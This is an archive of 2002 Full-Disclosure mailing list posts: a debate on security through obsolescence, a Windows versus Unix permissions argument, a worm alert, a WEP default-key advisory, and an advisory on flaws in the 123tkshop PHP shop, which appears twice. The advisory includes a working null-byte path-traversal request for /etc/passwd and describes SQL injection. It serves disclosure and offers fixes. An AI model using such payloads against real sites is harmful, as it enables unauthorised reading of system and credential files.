some of the most secure Department of Defense > Web sites -- ones that don't make headlines by getting cracked all the > time -- run old versions of Mac OS and the venerable WebSTAR server > suite. "[Mac is] a great operating system for that application," he > says. "No scripting or remote capability at all, so there's no way for > them to get in." > Not only that, the hacker/cracker crowd is fixating, as usual, on the > latest versions of everything, like Windows 2K/XP, Mac OS X, the most > recent Linux kernels and BSDs, the newest Solaris, and so on. What fun > is there in breaking into a system running something so ancient only a > dad would even consider using it? There's also an obscurity factor to > consider here, and not the one proprietary software advocates usually > trot out when discussing security issues. > True "security through obscurity" > Most Web site takedowns and system intrusions make use of known > vulnerabilities in a particular operating system or server software > package. These vulnerabilities are typically discovered, a little at a > time, by thousands of bad hackers who poke and prod at systems, > port-scanning and probing them, sharing the information they gain from > their (mostly failed) attempts with each other. A million monkeys with > Internet connections may not reproduce any Shakespeare plays -- they > need to use old-fashioned typewriters to do that -- but they sure as > bleep are going to find vulnerabilities in any host they contact > sooner or later simply by sheer weight of numbers, especially if the > operating system or software they attack is popular enough that they > have many instances of it out there to look and poke at. It doesn't > matter whether the operating system and server software under attack > is proprietary or Open Source. Sooner or later, with enough monkeys > scratching at it, every single chink or opening can be discovered and > exploited. > Imagine a custom operating system used by only a few servers, running > server software so oddball that cracking lessons learned on mainstream > servers don't apply to it at all. Or imagine running a DOS variant or > an OS like AIX that has never been widely used for Net-attached > servers but is adequate for handing out simple Web pages and receiving > responses through online forms and handling email, which are the > primary tasks performed on most publicly-accessible servers. > Now imagine your local script kiddie trying to crack a box running an > operating system and server software he's never seen before, about > which no information is available in the usual online hacker hangouts. > Chances are, he's going to move on to an easier target. > This is security through obscurity at its finest. Even if the custom > operating system and server software are Open Source, low-level > attackers aren't going to bother poring over the code thoroughly > enough to find its vulnerabilities, and those few who have the skill > level needed almost certainly have better things to do with their time > -- like work -- and won't bother. > Really dumb stuff > Never forget, most intrusions and defacements exploit really stupid > administrator or user mistakes, like using "password" as the password > for remote access or running all kinds of unnecessary services that > create security holes so big a whale could dive through them. These > lapses have nothing to do with the operating system or software being > used. No operating system or application ever written is immune to > user stupidity. Some just take more stupidity to botch than others, > you might say. But that's enough about that. Let's go back to talking > about old operating systems. > Age before beauty > One advantage of mature software is that lots of people have already > tried to crack it and lots of patches have been written. A smart > sysadmin like Brian, running an ancient version of Solaris, has kept > up with security updates over the years and has installed all of them > he has found. What some people might sneer at as "obsolete" software, > others might call "carefully tested" or "proven." Indeed, Debian Linux > users often point to the fact that Debian's stable branch does not > include the latest kernel or software as one of its great strengths; > Debian lets others explore the latest and greatest -- and fall victim > to the latest and greatest exploits -- before all the kinks are worked > out to the Debian maintainers' satisfaction. > Note that an awful lot of servers out there are still running on Red > Hat 6.1 or 6.2, not Red Hat 7.x, and that it takes a long time for the > latest version of Apache to trickle out into the world full-strength. > Because these programs have zero licensing cost attached to updates, > why would so many sysadmins keep using old versions when new ones no > doubt offer more and slicker features? Obviously, those sysadmins have > the same outlook as delivery truck fleet managers who refuse to buy a > new model during its first year or two in production. They prefer to > wait until all the kinks are worked out and all the defects and > maintenance tricks have been discovered and applied by early adopters > before jumping from the tried and true into something new. > This is sane behavior for a conservative business manager whether she > is running a fleet of Web servers or a fleet of trucks -- or even a > fleet of Web servers for a trucking company. But it may be even more > sane to hold on to the same servers and trucks even when others sneer > at them as being old, even if new versions are smoother and easier to > administer or drive. Quite simply, once you have worked with a piece > of software or a truck for a number of years, you know its quirks > inside and out. When it acts up in a subtle way someone not used to it > might not even notice, long experience with it can point an observant > sysadmin or mechanic straight to a problem, thereby saving downtime > and repair costs. > Because "Total Cost of Ownership" is the big management buzz phrase > that cuts across all business areas, and anything new requires a > learning curve, sometimes it is best to just keep on using the old > whatever as long as it does its job reasonably well. > At some point -- hopefully before Microsoft stops supporting it -- > Windows NT may be reasonably secure against most common exploits. If > nothing else, by that time there will be hundreds of thousands of > sysadmins who have learned how to secure it as hard as possible, even > if they had to learn some lessons the hard way -- by getting cracked. > At the same time, the script kiddies and malicious hackers who ran > roughshod over NT servers when they first appeared have aged. Most of > them probably have jobs and responsibilities by now, and aren't > getting their kicks playing in other people's systems but are busily > securing ones they run themselves. > The next generation of bad-kid hackers probably won't mess much with > NT -- or pre-X Mac OS or Linux pre-2.5 kernels or Apache pre-2.x or > any of the other operating systems and server applications their > fathers or older siblings ran "back in the day," while those same > fathers and older siblings will have piled up endless experience > securing those old, now-obscure programs, making them harder targets > than the latest stuff. > You never read about this kind of "security through obscurity," which > can just as correctly be called "security through obsolescence." > Despite this lack of publicity, it may be as effective a tactic as any > other, and it can be implemented without spending a dime. > ? Newsforge. All rights reserved From pauls at utdallas.edu Mon Jul 15 18:46:00 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Mon, 15 Jul 2002 12:46:00 -0500 Subject: [Full-Disclosure] w32.frethem.k@mm and good reading Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE347@UTDEVS02.campus.ad.utdallas.edu> Yes. It seems to be making some headway in Europe, but not so much in the US yet. Haven't heard anything about the Far East yet. Interesting article, BTW. Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Mark J. Walborn [mailto:markjw at lightlink.com] > Sent: Monday, July 15, 2002 4:50 PM > To: full-disclosure at lists.netsys.com > Subject: [Full-Disclosure] w32.frethem.k at mm and good reading > > > Has anyone encountered the above mentioned worm? Several > anti-viral software companies have posted updates as of midnight.. From mail at blazde.co.uk Mon Jul 15 19:58:08 2002 From: mail at blazde.co.uk (Roland Postle) Date: Mon, 15 Jul 2002 19:58:08 +0100 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) References: Message-ID: <002d01c22c31$9002afb0$0a00a8c0@violetclub> > because of programming errors. Encoding metadata such as "executableness" > in a filename, for example, is a fundamental design flaw, and one that's > impossible to correct without changing Windows' design. Sorry to pick on your example but an extension merly indicates what kind of data is in the file. A .txt extension suggests that a user might want to hand the file to a program that'll treat the file as plain ASCII, similarly an .exe extension suggests that a user might want to give the file some memory and time slices and treat it as a program in it's own right. You could load the .exe into notepad, and you could execute the .txt file. As for the actual security of whether a user /can/ execute a file, Windows doesn't seperate 'read' and 'execute' privileges well enough. However it's my understanding that's got more to do with the design of the x86 memory architecture than Windows' design. Linux just pretends to seperate 'r' and 'x' privs because it's a unix clone. I'm prepared to stand corrected on that though. I agree completly that Windows does have some fundamental design flaws that prevent it being locally secure. A better example might be the ability of an application to send messages to another application, apparently without regard for who the owner of the target application is. - Blazde From dfs at roaringpenguin.com Mon Jul 15 20:10:12 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 15:10:12 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <002d01c22c31$9002afb0$0a00a8c0@violetclub> Message-ID: On Mon, 15 Jul 2002, Roland Postle wrote: > > because of programming errors. Encoding metadata such as "executableness" > > in a filename, for example, is a fundamental design flaw, and one that's > > impossible to correct without changing Windows' design. > Sorry to pick on your example but an extension merly indicates what kind of > data is in the file. Not under Windows as it is configured by 99.99% of end-users. If you name a file "foo.txt", very different things happen if you click on the file than if you click on the exact same file named "foo.exe". > A .txt extension suggests that a user might want to > hand the file to a program that'll treat the file as plain ASCII, similarly > an .exe extension suggests that a user might want to give the file some > memory and time slices and treat it as a program in it's own right. You > could load the .exe into notepad, and you could execute the .txt file. Again, for 99.99% of end users, such fine points are irrelevant. To them, clicking on an .exe runs the program. Windows even "helpfully" hides the extension by default. > As for the actual security of whether a user /can/ execute a file, Windows > doesn't seperate 'read' and 'execute' privileges well enough. However it's > my understanding that's got more to do with the design of the x86 memory > architecture than Windows' design. Linux just pretends to seperate 'r' and > 'x' privs because it's a unix clone. I'm prepared to stand corrected on that > though. That is true when it comes to memory protection, but what you're talking about is filesystem protection, and Linux doesn't "pretend" anything -- it enforces it. I believe it is possible under some versions of Windows to allow read access but not execute access to files and directories, but again, 99% of end-users don't know this and don't configure it. > I agree completly that Windows does have some fundamental design flaws that > prevent it being locally secure. A better example might be the ability of an > application to send messages to another application, apparently without > regard for who the owner of the target application is. :-) I'm not familiar enough with Windows to be aware of things like that. Thanks. Regards, David. From dufresne at winternet.com Mon Jul 15 20:10:07 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Mon, 15 Jul 2002 14:10:07 -0500 (CDT) Subject: [Full-Disclosure] w32.frethem.k@mm and good reading In-Reply-To: <03c201c22c49$994e3770$1031020a@home.barrington.com> Message-ID: On Mon, 15 Jul 2002, Mark J. Walborn wrote: > Has anyone encountered the above mentioned worm? Several anti-viral software > companies have posted updates as of midnight.. > Trend Micro released this announcement on it recently: This non-destructive, memory-resident variant of WORM_FRETHEM.D propagates via email. It arrives as an attachment with the following details: Subject: Re: Your password! Message Body: You can access very important information by this password DO NOT SAVE password to disk use your mind now presscancel Attachment: DECRYPT-PASSWORD.EXE PASSWORD.TXT On systems with unpatched Internet Explorer, the file attachments automatically execute when this email message is previewed or opened in Microsoft Outlook and Outlook Express. WORM_FRETHEM.K is detected by pattern file #317. For more information on WORM_FRETHEM.K please visit our Web site at: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K > Also, I found the following article of interest. > > By Robin Miller, NewsForge.com > > Posted: 06/06/2002 at 12:10 GMT [article SNIPPED] They article in question discusses security through obscurity, which is not viewed as sound by most folks in the security arena. If the skript kiddies looked hard enough they surely could find older sploits for such systems, if they took the time to attempt to identify the underlying Os to any degree, and surely better crackers will take that time. Of course there is this bit on the issue recently: How often hackers attack, and what they're after. Attack activity against corporate networks went up significantly in the first half of 2002 when compared with the second half of 2001, but the good news is that the incidence of highly sophisticated attacks was low between January and June this year. Despite the increased activity, the number of attacks that are considered highly aggressive or sophisticated was less than 1 percent. When highly aggressive attacks occur, they are more than 26 times more likely to have severe effects than attacks that are classified as moderately aggressive, so even the small percentage of such attacks remains cause for concern. (Internet Week, 11 Jul) Which begs the question, are more sophisticated attacks really reduced, or are more of them actually going undetected? Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From dotslash at snosoft.com Mon Jul 15 17:59:31 2002 From: dotslash at snosoft.com (KF) Date: Mon, 15 Jul 2002 12:59:31 -0400 Subject: [Full-Disclosure] security through obsolescence??!@?! References: <03c201c22c49$994e3770$1031020a@home.barrington.com> Message-ID: <3D32FF73.6020809@snosoft.com> This has to be one of the stupidest comments I have ever heard! Do you honestly think that there are not people with REAL skill out there... not just simple skript kiddies. I certainly hope that you wouldn't try to "secure" your network with an old redhat 4.2 box, Xenix or an old NT 3.51 server. Installing old software is NOT an effective means of warding off attackers... infact you may attract a more "old school" with "0-day" from back in their day. There has to be numerious issues in those old OS's that people have not told the vendors ... there were never any public patches made ... etc. Don't kid yourselves... and if you REALLY think this works... be so kind as to give us the IP addresses for these legacy machines. -KF >> Posted: 06/06/2002 at 12:10 GMT >> [724.gif] Here's an interesting way to secure an Internet-connected >> computer against intruders: Make sure the operating system and >> software it runs are so old that current hacking tools won't work on >> it. This was suggested by Brian Aker, one of the programmers who works >> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs >> several servers of his own that host a number of small non-profit >> sites in the Seattle area. "I have one box still running a version of >> Solaris that's so old none of the script kiddies can figure it out," >> Brian says. "They tend to focus on the latest and greatest, and don't >> have the slightest idea how to handle my old Sun box." >> > > From mail at blazde.co.uk Mon Jul 15 20:35:14 2002 From: mail at blazde.co.uk (Roland Postle) Date: Mon, 15 Jul 2002 20:35:14 +0100 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) References: Message-ID: <008001c22c36$ee4e4c00$0a00a8c0@violetclub> I should mention that I'm only referring to Windows NT here, Windows 9x /is/ one monumental design flaw and not even worth talking about. > That is true when it comes to memory protection, but what you're > talking about is filesystem protection, and Linux doesn't "pretend" > anything -- it enforces it. I believe it is possible under some > versions of Windows to allow read access but not execute access to > files and directories, but again, 99% of end-users don't know this > and don't configure it. It's hardly a 'fundamental design flaw' if it can be configured differently. Many default unix installations will leave all a user's newly created files with world read access. And I bet the vast majority of novice computer users (the ones most at risk) would find it easier to change their file permissions on a Windows machine than a unix machine. The fact that 99% of Windows users are clueless is no reflection on Windows' actual security. - Blazde From pauls at utdallas.edu Mon Jul 15 20:59:59 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Mon, 15 Jul 2002 14:59:59 -0500 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!) Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Comments inline. Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: David F. Skoll [mailto:dfs at roaringpenguin.com] > Sent: Monday, July 15, 2002 2:10 PM > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] Counseling not to use Windows > (was Re: Anonymoussurfing my ass\!) > > > Sorry to pick on your example but an extension merly indicates what > > kind of data is in the file. > > Not under Windows as it is configured by 99.99% of end-users. > If you name a file "foo.txt", very different things happen > if you click on the file than if you click on the exact same > file named "foo.exe". That depends on how the admins configure things. :-) Here at UTD, for example, it isn't possible to execute a VBS file unless you know what you're doing. It's also possible to restrict the executables that a user can run, using group policies. > > > A .txt extension suggests that a user might want to > > hand the file to a program that'll treat the file as plain ASCII, > > similarly an .exe extension suggests that a user might want to give > > the file some memory and time slices and treat it as a > program in it's > > own right. You could load the .exe into notepad, and you > could execute > > the .txt file. > > Again, for 99.99% of end users, such fine points are > irrelevant. To them, clicking on an .exe runs the program. > Windows even "helpfully" hides the extension by default. And you think they will do *better* at this in *nix? You've pinpointed the problem, but missed the solution. The problem is the *users* who are ignorant and chose to remain that way. The solution is for the *conscientious* admins to understand that truth and find ways to defend the enterprise *anyway*. > > That is true when it comes to memory protection, but what > you're talking about is filesystem protection, and Linux > doesn't "pretend" anything -- it enforces it. I believe it > is possible under some versions of Windows to allow read > access but not execute access to files and directories, but > again, 99% of end-users don't know this and don't configure it. Your ignorance of Windows is showing. It is possible, under all "modern" versions of Windows (not the 9x variety) to get as granular as this (at the directory or file level): Full Control Traverse Folder / Execute File List Folder /Read Data Read Attributes Read Extend Attributes Create Files / Write Data Create Folders / Append Data Write Attributes Write Extended Attributes Delete Read Change Take Ownership It isn't the OS that's the problem. It's the manufacturer's choices of default settings and the ignorance of the users (and admins in many cases.) Isn't this precisely the same problem on *nix? Give me an ignorant user on a default install of *nix and I'll give you a hacked box in a few minutes (except perhaps OpenBSD, which is one of the few that ship "secure" out of the box.) Please don't misunderstand - I am NOT saying Windows is a good as or as secure as Unix. Given the choice, I'll take OpenBSD. But the *real* problem isn't software, it's humans. From steve at entrenchtech.com Mon Jul 15 21:03:24 2002 From: steve at entrenchtech.com (Steve) Date: Mon, 15 Jul 2002 14:03:24 -0600 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <008001c22c36$ee4e4c00$0a00a8c0@violetclub> Message-ID: <001101c22c3a$b08e3430$6501a8c0@Laptop2> > > The fact that 99% of Windows users are clueless is no > reflection on Windows' actual security. > I agree. I have some very large clients with thousands of workstations and thousands of servers and there is no way in hell that they will change all their workstations from Win2K to a *NIX distro based on some security scare tactics and FUD. Sure, new servers being put in, depending on their use and the IT departments exerptise can be *NIX based and many are. Yet, with my help, they have had clueless users open malicious emails and have the attached worm fail -- why? Because each and every workstation is locked down appropriately and still functions fully. Yeah it's a lot of work, but it can be done. Making the general statement to not use Windows shows nothing but ignorance of the configuration options available. Granted, if an organization was using nothing but Win98 then yes, I would say to them that they need to upgrade, but they can upgrade to a Windows O/S if they want. Hey if you don't know Windows just say so, we aren't going to laugh at you because you have the ability to understand *nix but not the easy point and crash Windows. :-) heh From dfs at roaringpenguin.com Mon Jul 15 21:14:01 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 16:14:01 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <008001c22c36$ee4e4c00$0a00a8c0@violetclub> Message-ID: On Mon, 15 Jul 2002, Roland Postle wrote: > I should mention that I'm only referring to Windows NT here, Windows 9x /is/ > one monumental design flaw and not even worth talking about. > It's hardly a 'fundamental design flaw' if it can be configured differently. Well, OK. But let's say you tighten up security on NT. Then you discover that all kinds of third-party (and Microsoft, for that matter) software doesn't work any more. > Many default unix installations will leave all a user's newly created files > with world read access. That's true. World-read access is slightly less of a problem than world-execute access. And some Linux distros (e.g. Mandrake) offer "security levels" which (among other things) let you change the default umask to 077. > And I bet the vast majority of novice computer users > (the ones most at risk) would find it easier to change their file > permissions on a Windows machine than a unix machine. Well, the vast majority of novice computer users aren't using UNIX (unless you count Mac OS X). > The fact that 99% of Windows users are clueless is no reflection on Windows' > actual security. But Microsoft touts "ease of use" which lulls people into believing that you don't need as much skill to use or secure Windows as UNIX. And that's irresponsible. -- David. From dfs at roaringpenguin.com Mon Jul 15 21:24:50 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 16:24:50 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!) In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Message-ID: On Mon, 15 Jul 2002, Schmehl, Paul L wrote: > That depends on how the admins configure things. :-) Here at UTD, for > example, it isn't possible to execute a VBS file unless you know what > you're doing. Well, that's very good. How about .exe? > It's also possible to restrict the executables that a > user can run, using group policies. Yes, it is. How much work is it to set all this up? [...] > And you think they will do *better* at this in *nix? You've pinpointed > the problem, but missed the solution. The problem is the *users* who > are ignorant and chose to remain that way. The solution is for the > *conscientious* admins to understand that truth and find ways to defend > the enterprise *anyway*. That's true. Nevertheless, I contend that it's easier for conscientious admins to protect UNIX boxes from ignorant users than to protect Windows boxes (period.) In fact, UNIX boxes are extremely easy to protect from the truly computer-ignorant, and they're not bad for experts. It's the people in the middle who are dangerous on UNIX boxes. :-) For example, my parents run Linux at home. They are complete computer newbies. So I set everything up for them, locked down all the permissions, and they're fine. An occasional VNC session over SSH is all the help they need from me. Some of the people I've worked with, however, know enough about UNIX to be dangerous and often screw things up... > Your ignorance of Windows is showing. It is possible, under all > "modern" versions of Windows (not the 9x variety) to get as granular as > this (at the directory or file level): I fully admit to ignorance of the details of Windows security, although I believe I grasp the overall situation. > Full Control > Traverse Folder / Execute File > List Folder /Read Data > Read Attributes > Read Extend Attributes > Create Files / Write Data > Create Folders / Append Data > Write Attributes > Write Extended Attributes > Delete > Read > Change > Take Ownership These are granular indeed, and confusing as hell. A good security model should be simple; the Windows one is anything but. I can probably outline the UNIX security model in 300 words. I challenge any Windows user to do the same for Windows. And complexity is the enemy of security. It can lead to misunderstanding, incorrect implementation, and ambiguity. > It isn't the OS that's the problem. I disagree. The design of the OS is a large part of the problem. (I say "OS" here to include Microsoft applications like IE, which (after all) Microsoft insists are part of the OS.) > It's the manufacturer's choices of > default settings and the ignorance of the users (and admins in many > cases.) Isn't this precisely the same problem on *nix? Give me an > ignorant user on a default install of *nix and I'll give you a hacked > box in a few minutes (except perhaps OpenBSD, which is one of the few > that ship "secure" out of the box.) That may have been true 3 or 4 years ago, but (at least in the Linux and *BSD worlds) is no longer. The default installation settings are pretty good nowadays. > Please don't misunderstand - I am NOT saying Windows is a good as or as > secure as Unix. Given the choice, I'll take OpenBSD. But the *real* > problem isn't software, it's humans. I'm not arguing with you on that point. But I think it's correct to say that any organization interested in long-term security planning should consider weaning itself away from proven-insecure software. Microsoft's track record is really terrible, and I don't see any indications that things are changing. How much benefit of the doubt do vendors deserve, anyway? -- David. From steve at entrenchtech.com Mon Jul 15 21:24:49 2002 From: steve at entrenchtech.com (Steve) Date: Mon, 15 Jul 2002 14:24:49 -0600 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: Message-ID: <001301c22c3d$ae0510f0$6501a8c0@Laptop2> > > Well, OK. But let's say you tighten up security on NT. Then > you discover that all kinds of third-party (and Microsoft, for that > matter) software doesn't work any more. Been there done that. You put yourself in a lab with test boxes, lock the machine down then slowly relax things until all the apps work. Then, when new custom apps are being developed, they get developed on the locked down platform and with good developers, this can work. Granted, a lot of organizations have problems with this but that why I get paid. :-) > But Microsoft touts "ease of use" which lulls people into > believing that you don't need as much skill to use or secure > Windows as UNIX. And that's irresponsible. I agree. MS has always put usability over security. Hopefully things will change but I'm not holding my breath. From avart at gmx.de Mon Jul 15 21:56:40 2002 From: avart at gmx.de (avart at gmx.de) Date: Mon, 15 Jul 2002 22:56:40 +0200 (MEST) Subject: [Full-Disclosure] Again NULL and addslashes() (now in 123tkshop) Message-ID: <24546.1026766600@www31.gmx.net> Hi! Ok, another announce about a php application containing unslashed SQL-Queries and bad include/require statements. Several problems in 123tkshop ------------------------------------- # What is 123tkshop? 123tkshop is a ecommerce software written in php. It's providing a full featured online shop. More information are available at: #### include + NULL problem #### # Problem description There are several include statements which use variables passed by the user. So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver: function_foot_1.inc.php [...] include("styles/$designNo/footer.php"); [...] # So what's the problem with NULL? If $designNo contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior: foobar.php looks like this: Calling the file with the following parameter: foobar.php?input=bla%00bla results in (with enabled magic_quotes_gcp):
Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
This doesn't seem to be exploitable, but what happens, if magic_quotes_gcp is turned off (like on php.ini-recommened, for performance reasons, without pointing to THIS kind of problem)?:
Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the avaiable users: foobar.php?input=../../../etc/passwd%00 Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www. # And the solution? One can test, if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file. # Fix? The author released a new version (0.3.1) that checks _every_ file being included. You can download it at . If you aren't able to update an older version, enable "magic_quotes_gqc". See for further information about securing php applications. #### missing addslashes() #### # Problem description A lot of data passed (there are just a few exeptions) to mysqld is NOT checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists, when magic_quotes_gpc is turned off. function_describe_item1.inc.php is one of the dangerous files. For further information about dangerous sql queries see: * . * # And the solution? One can use addslashes() for _every_ data a user enters and is submitted to the database. Lazy people hope, that magic_quotes_gpc is enabled. Never expect, that an admin configured a webserver correct, try to start the security at application level. # Fix? The author will release a new version ASAP. ##### Credits ##### For the german-speaking folk: -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net From core at bokeoa.com Mon Jul 15 22:23:40 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Mon, 15 Jul 2002 15:23:40 -0600 Subject: [Full-Disclosure] security through obsolescence??!@?! References: <03c201c22c49$994e3770$1031020a@home.barrington.com> <3D32FF73.6020809@snosoft.com> Message-ID: <3D333D5C.1070501@bokeoa.com> kevin, word man... rexd to the rescue? hehe... my god I know a couple of sysadmins who have the same philosophy. but it's pointless. it's like removing read priveleges from vulnerable suids! some of us have over a gigabyte of security related exploits, scanners, sniffers, backdoors etc.. Dating back to the 80's. ;) peace, core KF wrote: > This has to be one of the stupidest comments I have ever heard! Do you > honestly think that there are not people with REAL skill out there... > not just simple skript kiddies. I certainly hope that you wouldn't try > to "secure" your network with an old redhat 4.2 box, Xenix or an old NT > 3.51 server. Installing old software is NOT an effective means of > warding off attackers... infact you may attract a more "old school" with > "0-day" from back in their day. There has to be numerious issues in > those old OS's that people have not told the vendors ... there were > never any public patches made ... etc. Don't kid yourselves... and if > you REALLY think this works... be so kind as to give us the IP addresses > for these legacy machines. > -KF > > >>> Posted: 06/06/2002 at 12:10 GMT >>> [724.gif] Here's an interesting way to secure an Internet-connected >>> computer against intruders: Make sure the operating system and >>> software it runs are so old that current hacking tools won't work on >>> it. This was suggested by Brian Aker, one of the programmers who works >>> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs >>> several servers of his own that host a number of small non-profit >>> sites in the Seattle area. "I have one box still running a version of >>> Solaris that's so old none of the script kiddies can figure it out," >>> Brian says. "They tend to focus on the latest and greatest, and don't >>> have the slightest idea how to handle my old Sun box." >>> >> >> > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From avart at gmx.de Mon Jul 15 21:56:40 2002 From: avart at gmx.de (avart at gmx.de) Date: Mon, 15 Jul 2002 22:56:40 +0200 (MEST) Subject: [Full-Disclosure] Again NULL and addslashes() (now in 123tkshop) Message-ID: <24546.1026766600@www31.gmx.net> Hi! Ok, another announce about a php application containing unslashed SQL-Queries and bad include/require statements. Several problems in 123tkshop ------------------------------------- # What is 123tkshop? 123tkshop is a ecommerce software written in php. It's providing a full featured online shop. More information are available at: #### include + NULL problem #### # Problem description There are several include statements which use variables passed by the user. So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver: function_foot_1.inc.php [...] include("styles/$designNo/footer.php"); [...] # So what's the problem with NULL? If $designNo contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior: foobar.php looks like this: Calling the file with the following parameter: foobar.php?input=bla%00bla results in (with enabled magic_quotes_gcp):
Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
This doesn't seem to be exploitable, but what happens, if magic_quotes_gcp is turned off (like on php.ini-recommened, for performance reasons, without pointing to THIS kind of problem)?:
Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the avaiable users: foobar.php?input=../../../etc/passwd%00 Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www. # And the solution? One can test, if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file. # Fix? The author released a new version (0.3.1) that checks _every_ file being included. You can download it at . If you aren't able to update an older version, enable "magic_quotes_gqc". See for further information about securing php applications. #### missing addslashes() #### # Problem description A lot of data passed (there are just a few exeptions) to mysqld is NOT checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists, when magic_quotes_gpc is turned off. function_describe_item1.inc.php is one of the dangerous files. For further information about dangerous sql queries see: * . * # And the solution? One can use addslashes() for _every_ data a user enters and is submitted to the database. Lazy people hope, that magic_quotes_gpc is enabled. Never expect, that an admin configured a webserver correct, try to start the security at application level. # Fix? The author will release a new version ASAP. ##### Credits ##### For the german-speaking folk: -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net From dufresne at winternet.com Mon Jul 15 22:34:31 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Mon, 15 Jul 2002 16:34:31 -0500 (CDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!) In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Message-ID: On Mon, 15 Jul 2002, Schmehl, Paul L wrote: [SNIP] > > It isn't the OS that's the problem. It's the manufacturer's choices of > default settings and the ignorance of the users (and admins in many > cases.) Isn't this precisely the same problem on *nix? Give me an > ignorant user on a default install of *nix and I'll give you a hacked > box in a few minutes (except perhaps OpenBSD, which is one of the few > that ship "secure" out of the box.) > > Please don't misunderstand - I am NOT saying Windows is a good as or as > secure as Unix. Given the choice, I'll take OpenBSD. But the *real* > problem isn't software, it's humans. You hit on the duality of the issue beofre trying to refine it into a plurality issue. The *real* problem is vendors relasing bugy code with insecure defaults which *promotes* users remaining clueless. take a look at the wireless issues spewing into the airwaves now, and look at not only the default installs of the products available for playing with wireless toys and trikets, but, take a serious look at the documentation and how much is devoted to the issue of securing the toys. For example, take a look at the pdf manual for the d-link dwl-650 wireless net card, 80 pages of which about 2 pages are devoted to trying to secure the devices in any fashion via wep, not that wep is all that secure, but, it beats nothing . Or consider this, even if a vendor 'attempts' to do something less then a default open braodcast: Orinoco RG-1000 residential gateway is reported in past advisories to ship with WEP enabled; From: Bill Arbaugh Subject: RG-1000 802.11 Residential Gateway default WEP key disclosure flaw Date: Mon, 2 Apr 2001; Unfortunately, the default WEP key is set to the default network name, SSID. The SSID appears in several 802.11 management frames in the clear-- even when WEP is enabled. Therefore, an attacker with a sniffer capable of capturing management frames can determine the current WEP key which is the last five digits of the network name, (provided the default has not been changed). Armed with the network name, and the current WEP key the attacker can easily gain access to the users wireless LAN. Additionally, the default network name for the unit studied was the last six nibbles of the MAC address converted into ASCII [1]. As a result even if the key were not the network name, an attacker could determine it by sniffing the MAC address of the unit. To Lucent/Ornioco's credit, the fact that the default encryption key should be changed is strongly encouraged in the manual. However, the fact that the default key is disclosed in the clear as part of the network name is unfortunate. The default encryption key should be changed to a randomly generated value set at the factory. The moral to this is, don't just beatup on the users, but, get ugly with the vendors and force them to pay attention to security as well, and force users to shoot themselves in the foot 